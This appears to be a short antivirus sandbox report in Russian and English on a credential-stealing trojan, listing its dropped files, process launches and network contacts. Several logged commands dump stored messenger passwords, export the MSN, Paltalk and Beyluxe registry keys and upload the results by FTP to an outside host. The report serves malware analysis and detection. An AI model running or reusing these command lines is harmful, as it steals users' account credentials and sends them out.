Техническая информация
- %TEMP%\2.tmp\msnpass.exe CRNJEUFU_Msn.txt
- %TEMP%\1.tmp\do.exe
- %TEMP%\1.tmp\7.exe e do.zip -palchimiste
- <SYSTEM32>\reg.exe export "HKEY_CURRENT_USER\Software\Beyluxe Messenger" CRNJEUFU_Beyluxe.txt
- <SYSTEM32>\reg.exe export "HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\UserExtendedProperties" CRNJEUFU_Msn.txt
- <SYSTEM32>\ftp.exe -i -s:up.dll application.netai.net
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\extract.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\do.bat" "
- <SYSTEM32>\reg.exe export "HKEY_CURRENT_USER\Software\Paltalk" CRNJEUFU_Paltalk.txt
- [<HKCU>\Software\Paltalk]
- %TEMP%\2.tmp\msnpass.exe
- %TEMP%\2.tmp\up.dll
- %TEMP%\2.tmp\crnjeufu_msn.txt
- %TEMP%\2.tmp\CRNJEUFU_VolumeSerial.txt
- %TEMP%\2.tmp\do.bat
- %TEMP%\1.tmp\do.exe
- %TEMP%\1.tmp\extract.bat
- %TEMP%\1.tmp\un.bat
- %TEMP%\1.tmp\7.exe
- %TEMP%\2.tmp\do.bat
- %TEMP%\1.tmp\extract.bat
- 'localhost':1037
- 'ap#####tion.netai.net':21
- DNS ASK ap#####tion.netai.net